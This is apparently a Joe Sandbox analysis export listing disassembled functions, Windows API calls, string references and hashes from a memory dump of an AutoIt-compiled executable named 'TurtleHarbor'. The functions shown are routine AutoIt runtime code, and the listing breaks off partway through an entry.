Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0f48bb74ecfe69f6184e21c6e90cf65fb1428f030c58501f20fa57f73e577b7
Instruction ID: 26af70e4f8fac4c6b0761d139c425b401d3e90b5f108dcaee2e4016691925b7e
Opcode Fuzzy Hash: b0f48bb74ecfe69f6184e21c6e90cf65fb1428f030c58501f20fa57f73e577b7
Instruction Fuzzy Hash: A522CE74A04206CFDB2ADF54C4A0BEEB7B5FF49310F15816AE846AB351E334AD85CB91

Function 0031BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0031BF57

Part of subcall function 003152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003152E6

Sleep.KERNEL32(0000000A,?,?), ref: 003536B5

Strings

@GUI_WINHANDLE, xrefs: 003537C1
@TRAY_ID, xrefs: 00353FCD
@GUI_CTRLHANDLE, xrefs: 00353816
@COM_EVENTOBJ, xrefs: 00353D2E
CALL, xrefs: 0031C277
@GUI_CTRLID, xrefs: 0035376C

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: eb2b113e59aee0d29c51e5c3834eac3c7e70b1e4273655980d0b9a11a205fe40
Instruction ID: e92849b9500da56db320938e4c6b1e4dda9fe49ee3bd6a03a206818ff0fd6457
Opcode Fuzzy Hash: eb2b113e59aee0d29c51e5c3834eac3c7e70b1e4273655980d0b9a11a205fe40
Instruction Fuzzy Hash: 2AC29370608341DFD72ADF24C885FAAB7E4FF88344F15491DE88A8B261D771E989CB52

Function 003133E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 74windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00313444
RegisterClassExW.USER32(00000030), ref: 0031346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031347F
InitCommonControlsEx.COMCTL32(?), ref: 0031349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003134AC
LoadIconW.USER32(000000A9), ref: 003134C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003134D1

Strings

AutoIt v3 GUI, xrefs: 00313460
0, xrefs: 00313426
+, xrefs: 0031342D
TaskbarCreated, xrefs: 00313474

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 05abe7cad01942f3290925239ce0d5c3908238ba4f2621ce6d9e6d03d202f1b1
Instruction ID: 3248df531e7e00d12463ab08d3db4a4f31a4e384728e8602dade39527a36fe39
Opcode Fuzzy Hash: 05abe7cad01942f3290925239ce0d5c3908238ba4f2621ce6d9e6d03d202f1b1
Instruction Fuzzy Hash: 58314871845309AFDB42CFA4EC89BCDBBF8FB0A310F10411AE580E62A0E3B61581DF50

Function 00313411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00313444
RegisterClassExW.USER32(00000030), ref: 0031346E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031347F
InitCommonControlsEx.COMCTL32(?), ref: 0031349C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003134AC
LoadIconW.USER32(000000A9), ref: 003134C2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003134D1

Strings

AutoIt v3 GUI, xrefs: 00313460
0, xrefs: 00313426
+, xrefs: 0031342D
TaskbarCreated, xrefs: 00313474

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8faae9d23bee983dd3628c9af522d25f2e8f806cb4e17269aae0fa31e6817329
Instruction ID: 39bd86c8ba029516feeca1e9bd745e3ac5cd29074bdb733d1652198546459e7e
Opcode Fuzzy Hash: 8faae9d23bee983dd3628c9af522d25f2e8f806cb4e17269aae0fa31e6817329
Instruction Fuzzy Hash: 9421E3B1905318AFDB06DFA4EC89BDDBBF8FB09700F00411AF910A62A0E7B11544DF91

Function 00322FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003300CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00323094), ref: 003300ED

Part of subcall function 003308C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,0032309F), ref: 003308E3

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 003230E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003601BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003601FB
RegCloseKey.ADVAPI32(?), ref: 00360239
_wcscat.LIBCMT ref: 00360292

Strings

Software\AutoIt v3\AutoIt, xrefs: 003230D8
\Include\, xrefs: 0032309F
\, xrefs: 003602B5
Include, xrefs: 003601B1, 003601F2

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 4c40bc9acfeeec4df3c83b959cd49521ae20e23694b8e711652f739fc2a14b18
Instruction ID: 14971a2afc73463b06d8bf2b8707277e57557cb06a9fdf554633dd008e0d04a4
Opcode Fuzzy Hash: 4c40bc9acfeeec4df3c83b959cd49521ae20e23694b8e711652f739fc2a14b18
Instruction Fuzzy Hash: 30715D7140A7119EC307EF65E8929ABBBECFF55340F40492EF445872A0EF30A944CB91

Function 0032514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00325156
LoadCursorW.USER32(00000000,00007F00), ref: 00325165
LoadIconW.USER32(00000063), ref: 0032517C
LoadIconW.USER32(000000A4), ref: 0032518E
LoadIconW.USER32(000000A2), ref: 003251A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 003251C6
RegisterClassExW.USER32(?), ref: 0032521C

Part of subcall function 00313411: GetSysColorBrush.USER32(0000000F), ref: 00313444
Part of subcall function 00313411: RegisterClassExW.USER32(00000030), ref: 0031346E
Part of subcall function 00313411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031347F
Part of subcall function 00313411: InitCommonControlsEx.COMCTL32(?), ref: 0031349C
Part of subcall function 00313411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003134AC
Part of subcall function 00313411: LoadIconW.USER32(000000A9), ref: 003134C2
Part of subcall function 00313411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 003134D1

Strings

0, xrefs: 003251FA
#, xrefs: 00325201
AutoIt v3, xrefs: 0032520B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 1ff27740e0a697436b4eb6afd2363a01d59796c3e2c6d1ecea212fd92f2848c0
Instruction ID: 5c3b04f743d9db9e6d5f7dd7ea1bde865b5a8f8978b8525fe87a29d2643c867a
Opcode Fuzzy Hash: 1ff27740e0a697436b4eb6afd2363a01d59796c3e2c6d1ecea212fd92f2848c0
Instruction Fuzzy Hash: 2C216B70D06358AFEB169FA4FD09B9D7FB8FB08311F00455AF504A62A0E7B65650CF84

Function 00324D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00324E22
KillTimer.USER32(?,00000001), ref: 00324E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00324E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00324E7A
CreatePopupMenu.USER32 ref: 00324E8E
PostQuitMessage.USER32(00000000), ref: 00324EAF

Strings

TaskbarCreated, xrefs: 00324E75

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 24e8ad22efe4ed7f31f01d5285ec85460884b404768db57220aec2b98a2d7a98
Instruction ID: dfbd0108dd48a16df35648785bb233a9f723b300537a50e6298370ee8349c272
Opcode Fuzzy Hash: 24e8ad22efe4ed7f31f01d5285ec85460884b404768db57220aec2b98a2d7a98
Instruction Fuzzy Hash: F5414971248266ABFB1B5F24FC0AB7E779DF745300F020526F902966A2EB719C50A771

Function 0031AD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0031ADE1
OleUninitialize.OLE32(?,00000000), ref: 0031AE80
UnregisterHotKey.USER32(?), ref: 0031AFD7
DestroyWindow.USER32(?), ref: 00352F64
FreeLibrary.KERNEL32(?), ref: 00352FC9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00352FF6

Strings

close all, xrefs: 0031ADDC

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 6344ca0a7ae262a5bcf49b42fd5f4bdfbba878d28c6ce87a00f885a9e8136048
Instruction ID: b90a9c491c380df7b8d063eb0680fe516770b8334d1c6d293caeeadf3791b9e4
Opcode Fuzzy Hash: 6344ca0a7ae262a5bcf49b42fd5f4bdfbba878d28c6ce87a00f885a9e8136048
Instruction Fuzzy Hash: 73A15E747022228FCB2BEF14D995E69F364BF05741F1142ADE80AAB261CB31AD56CF91

Function 003256F8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00360C5B

Part of subcall function 00321821: _memmove.LIBCMT ref: 0032185B

_memset.LIBCMT ref: 00325787
_wcscpy.LIBCMT ref: 003257DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003257EB
__swprintf.LIBCMT ref: 00360CD1

Strings

Line %d: , xrefs: 00360CCB
AutoIt - , xrefs: 00325760

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt -
API String ID: 230667853-4094128768
Opcode ID: 850efe6f945e82ebf6fde178be26d1bd86a51ecf2297031665404429284e931b
Instruction ID: 25a24e62cdf5a0ba55cd76ce85e4dabd96d35b2f70cc622dfbe24423d858a3ae
Opcode Fuzzy Hash: 850efe6f945e82ebf6fde178be26d1bd86a51ecf2297031665404429284e931b
Instruction Fuzzy Hash: 4741C571008314AAC327EB64ED86FEF77ECAF54350F004A1EF585960A2EB349648C796

Function 00377681 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00377698

Part of subcall function 00330FE6: std::exception::exception.LIBCMT ref: 0033101C
Part of subcall function 00330FE6: __CxxThrowException@8.LIBCMT ref: 00331031

ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003776CF
EnterCriticalSection.KERNEL32(?), ref: 003776EB
_memmove.LIBCMT ref: 00377739
_memmove.LIBCMT ref: 00377756
LeaveCriticalSection.KERNEL32(?), ref: 00377765
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0037777A
InterlockedExchange.KERNEL32(?,000001F6), ref: 00377799

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 1bdcbf424437cb14640feba561e18e8967e3b09b6c6568dec183acc184ef42ed
Instruction ID: b4996d70036713d2acd41f52b48335354927a5a27343aa6f06b3f3c71d912c0b
Opcode Fuzzy Hash: 1bdcbf424437cb14640feba561e18e8967e3b09b6c6568dec183acc184ef42ed
Instruction Fuzzy Hash: E5318D76904205EBCB16EFA4DC85EAEB7B8EF45300F1480A5F904AF256DB34DE54DBA0

Function 003250DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00325109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0032512A
ShowWindow.USER32(00000000), ref: 0032513E
ShowWindow.USER32(00000000), ref: 00325147

Strings

edit, xrefs: 00325124
AutoIt v3, xrefs: 00325101, 00325106, 00325107

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: cb6ee8601fa3fd4e9e59f1f87483fbc94cdb258e0c4eb0dcb6162239c556e145
Instruction ID: 8368052c715893ea8b36be4457d74b974f980529ed51c1eecd32293684867413
Opcode Fuzzy Hash: cb6ee8601fa3fd4e9e59f1f87483fbc94cdb258e0c4eb0dcb6162239c556e145
Instruction Fuzzy Hash: 3BF0B7715462A47AEA221727BC48E672F7DE7C7F50F00451BB900A21B0E6711851DAB0

Function 00379B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00324A8C: _fseek.LIBCMT ref: 00324AA4

Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DE1
Part of subcall function 00379CF1: _wcscmp.LIBCMT ref: 00379DF4

_free.LIBCMT ref: 00379C5F
_free.LIBCMT ref: 00379C66
_free.LIBCMT ref: 00379CD1

Part of subcall function 00332F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00339C54,00000000,00338D5D,003359C3,?), ref: 00332F99
Part of subcall function 00332F85: GetLastError.KERNEL32(00000000,?,00339C54,00000000,00338D5D,003359C3,?), ref: 00332FAB

_free.LIBCMT ref: 00379CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00379B8F

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 74ab338f6953f5df3bfe3df9f5d969e051e7173f2537b5900a7733cb8ae59ebe
Instruction ID: 9cef9663f17cea6a2f3a221e31511b255b7a3d65e877d0821db0f18495f2a10a
Opcode Fuzzy Hash: 74ab338f6953f5df3bfe3df9f5d969e051e7173f2537b5900a7733cb8ae59ebe
Instruction Fuzzy Hash: 17514CB1904229AFDF25DF64DC81BAEBBB9FF48304F00419EF649A7241DB755A808F58

Function 00330FE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0033593C: __FF_MSGBANNER.LIBCMT ref: 00335953
Part of subcall function 0033593C: __NMSG_WRITE.LIBCMT ref: 0033595A
Part of subcall function 0033593C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,?,?,?,?,00331003,?,0000FFFF), ref: 0033597F

std::exception::exception.LIBCMT ref: 0033101C
__CxxThrowException@8.LIBCMT ref: 00331031

Part of subcall function 003387CB: RaiseException.KERNEL32(?,?,0000FFFF,003CCAF8,?,?,?,?,?,00331036,0000FFFF,003CCAF8,?,00000001), ref: 00338820

Strings

`=:, xrefs: 00331019, 00331026
`=:, xrefs: 00331029
h=:, xrefs: 00331011

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: `=:$`=:$h=:
API String ID: 3902256705-2110702576
Opcode ID: 626cfe43b9e6ff0c4f21a00dd7d7d07b8438ac2e959b01e33ff35d0651e56073
Instruction ID: 11bfe75be327bece269929b01eab4d041092bd9fa831b9eeec0b41cd83646c0c
Opcode Fuzzy Hash: 626cfe43b9e6ff0c4f21a00dd7d7d07b8438ac2e959b01e33ff35d0651e56073
Instruction Fuzzy Hash: 2DF0C87554431DA6CB27BB98DC95ADEB7ACDF01310F100455F914AA191DFB18B80C2E0

Function 0033563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0033569B
_memcpy_s.LIBCMT ref: 0033570D
__read_nolock.LIBCMT ref: 0033576B
__filbuf.LIBCMT ref: 0033578E
_memset.LIBCMT ref: 003357D2

Part of subcall function 00338D58: __getptd_noexit.LIBCMT ref: 00338D58

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: 1c1c9768d1110f94f3a81ac88212756d4e3feedf455e3cf041dcd6f3c367d954
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: DA51C370A00B05DBDB2A8FB9C8C566EB7B5AF40320F258729F8359A6D0D7709D509B40

Function 003152B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003152E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0031534A
TranslateMessage.USER32(?), ref: 00315356
DispatchMessageW.USER32(?), ref: 00315360

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: bc6753c3e762c533a38e62a750e5db8d7fa9581577ce862a82763403cf503b22
Instruction ID: 1eec856fbe3370be58cdf0ff68f1dba774209a283dbcc07a9a388497fee5fe5d
Opcode Fuzzy Hash: bc6753c3e762c533a38e62a750e5db8d7fa9581577ce862a82763403cf503b22
Instruction Fuzzy Hash: D1310731508706DBEB3B8B64EC44FF937EC9B89344F15085AE4628B5E0E7B1A8C9E711

Function 0031ABB7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117comCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0031AD08
OleInitialize.OLE32(00000000), ref: 0031AD85

Strings

<w=, xrefs: 0031AC6B

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
